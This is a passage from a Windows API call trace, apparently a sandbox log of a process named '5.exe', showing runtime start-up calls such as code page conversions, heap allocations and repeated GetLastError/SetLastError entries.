lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2f811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0116.124] FreeEnvironmentStringsW (penv=0x314b30) returned 1 [0116.124] GetLastError () returned 0x0 [0116.124] SetLastError (dwErrCode=0x0) [0116.124] GetLastError () returned 0x0 [0116.124] SetLastError (dwErrCode=0x0) [0116.124] GetLastError () returned 0x0 [0116.124] SetLastError (dwErrCode=0x0) [0116.124] GetACP () returned 0x4e4 [0116.124] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x220) returned 0x2f81768 [0116.124] GetLastError () returned 0x0 [0116.124] SetLastError (dwErrCode=0x0) [0116.124] IsValidCodePage (CodePage=0x4e4) returned 1 [0116.124] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fa90 | out: lpCPInfo=0x18fa90) returned 1 [0116.124] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f55c | out: lpCPInfo=0x18f55c) returned 1 [0116.124] GetLastError () returned 0x0 [0116.124] SetLastError (dwErrCode=0x0) [0116.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f970, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f970, cbMultiByte=256, lpWideCharStr=0x18f2d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌桬FĀ") returned 256 [0116.125] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ狌桬FĀ", cchSrc=256, lpCharType=0x18f570 | out: lpCharType=0x18f570) returned 1 [0116.125] GetLastError () returned 0x0 [0116.125] SetLastError (dwErrCode=0x0) [0116.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f970, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f970, cbMultiByte=256, lpWideCharStr=0x18f2a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ룘EĀ") returned 256 [0116.125] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ룘EĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0116.125] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ룘EĀ", cchSrc=256, lpDestStr=0x18f098, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0116.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18f870, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÔ²û ¨ú\x18", lpUsedDefaultChar=0x0) returned 256 [0116.125] GetLastError () returned 0x0 [0116.125] SetLastError (dwErrCode=0x0) [0116.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f970, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f970, cbMultiByte=256, lpWideCharStr=0x18f2c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ룘EĀ") returned 256 [0116.125] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ룘EĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0116.125] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ룘EĀ", cchSrc=256, lpDestStr=0x18f0b8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0116.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18f770, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÔ²û ¨ú\x18", lpUsedDefaultChar=0x0) returned 256 [0116.125] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x48adf0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe")) returned 0x56 [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.126] SetLastError (dwErrCode=0x0) [0116.126] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.127] GetLastError () returned 0x0 [0116.127] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.128] SetLastError (dwErrCode=0x0) [0116.128] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.129] SetLastError (dwErrCode=0x0) [0116.129] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.130] SetLastError (dwErrCode=0x0) [0116.130] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.131] SetLastError (dwErrCode=0x0) [0116.131] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.132] GetLastError () returned 0x0 [0116.132] SetLastError (dwErrCode=0x0) [0116.133] GetLastError () returned 0x0 [0116.133] SetLastError (dwErrCode=0x0) [0116.133] GetLastError () returned 0x0 [0116.133] SetLastError (dwErrCode=0x0) [0116.133] GetLastError () returned 0x0 [0116.133] SetLastError (dwErrCode=0x0) [0116.133] GetLastError () returned 0x0 [0116.133] SetLastError (dwErrCode=0x0) [0116.134] GetLastError () returned 0x0 [0116.134] SetLastError (dwErrCode=0x0) [0116.134] GetLastError () returned 0x0 [0116.134] SetLastError (dwErrCode=0x0) [0116.134] GetLastError () returned 0x0 [0116.134] SetLastError (dwErrCode=0x0) [0116.134] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.135] GetLastError () returned 0x0 [0116.135] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.136] SetLastError (dwErrCode=0x0) [0116.136] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] RtlAllocateHeap (HeapHandle=0x2f80000, Flags=0x0, Size=0x5f) returned 0x2f81990 [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.137] GetLastError () returned 0x0 [0116.137] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.138] SetLastError (dwErrCode=0x0) [0116.138] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.139] SetLastError (dwErrCode=0x0) [0116.139] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.140] GetLastError () returned 0x0 [0116.140] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.141] SetLastError (dwErrCode=0x0) [0116.141] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] GetLastError () returned 0x0 [0116.142] SetLastError (dwErrCode=0x0) [0116.142] 